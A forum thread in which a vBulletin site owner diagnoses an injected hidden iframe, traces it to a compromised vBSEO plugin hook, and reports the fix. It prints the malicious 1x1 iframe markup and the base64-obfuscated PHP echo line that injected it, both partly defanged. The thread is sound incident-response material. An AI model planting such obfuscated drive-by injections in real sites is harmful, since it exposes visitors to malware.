Need a hand - Server "Hacked"

[MrEyes]

I can't believe I am posting this, but I need a hand as somebody is obviously smarter than me and the multiple layers of security I have around my site.

Today users have reported that their AV scanners are reporting errors when visiting my site.

On investigation I have found that I have an iframe embedded in my site markup before the doctype declaration. The iframe code is:

HTML Code:

<iframe name="fra" width="1" height="1" scrolling="no" frameborder="no" marginwidth="0" marginheight="0" src="http://www.url_removed_by_mreyes.co.cc/se.php"></iframe>

I have searched all styles and templates for the iframe code, I have checked the doctype in style manager. I have no idea how this is being injected.

So can anybody tell me what this could be?

--------------- Added [DATE]1267906793[/DATE] at [TIME]1267906793[/TIME] ---------------

I am fairly certain that this is somehow coming out of vbulletin as other PHP pages (not powered by VB) on the same site are not effected

[Digital Jedi]

Try checking for custom error documents or other files in your domains folders. See if any of this helps: http://www.grafxsoftware.com/faq.php...to-start/1/14/

[MrEyes]

Having done a little more hunting around it seems that this problem lies with me using an older version of vbseo:

http://www.vbulletin.com/forum/showt...ease-some-tips.

However, I have upgraded the site and also run the suggested template reparser from here:

https://vborg.vbsupport.ru/showthrea...parse+template

But the iframe is still present on VB powered pages. Current searching through the DB to see if it is in there somewhere.

--------------- Added [DATE]1267912363[/DATE] at [TIME]1267912363[/TIME] ---------------

Well I am still at a loss

I have upgraded vBulletin to the latest 3.8 version, I have upgraded vbseo to the latest version.

I can only imagine that this is coming from the DB somehow - suppose I should keep looking through all the tables

--------------- Added [DATE]1267916034[/DATE] at [TIME]1267916034[/TIME] ---------------

Fixed

After upgrading the 3.8.4 PL1 and upgrading vbSEO the hole was plugged however the iframe was still present.

After searching through templates looking for "iframe" and not finding anything, I then started to look through files. After not finding anything in there I realised that I should have tried something else first, disable all hooks.

After doing this the problem was fixed, so the issue was with one of the plugins/products. By a process of elimation I tied this down to the vBSEO Downloads II product, specifically the hook onto global_complete.

At the end of the PHP code for this I found the following PHP code:

PHP Code:

echo base64_decode("PGlmcmFtZSBuYW1lPSJmcmEiIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHNjcm9sbGluZz0ibm8iIGZy
YW1lYm9yZGVyPSJubyIgbDSWFyZ2lud2lkdGg9IjAiIG1hcmdpbmhlaWdodD0iMCIgc3JjPSJodHRw
Oi8vd3d3LmtvbGVrLmNvLmNjL3NlLnBocCI+PC9pZnJhbWU+"); 


I have edited the base64 string to prevent anybody doing something by accident

That base64 string contains the markup for the iframe, which is why DB, template, phrase etc searches turned up nothing when searching for "iframe" or other strings in the malicious code.

All fixed, panic over

Moral to this story, keep your software up to date - this was my fault

Moral #2 to this story - if this happens to you, just as a precaution change all your passwords, ftp, cpanel, plesk, forum accounts etc etc etc etc etc.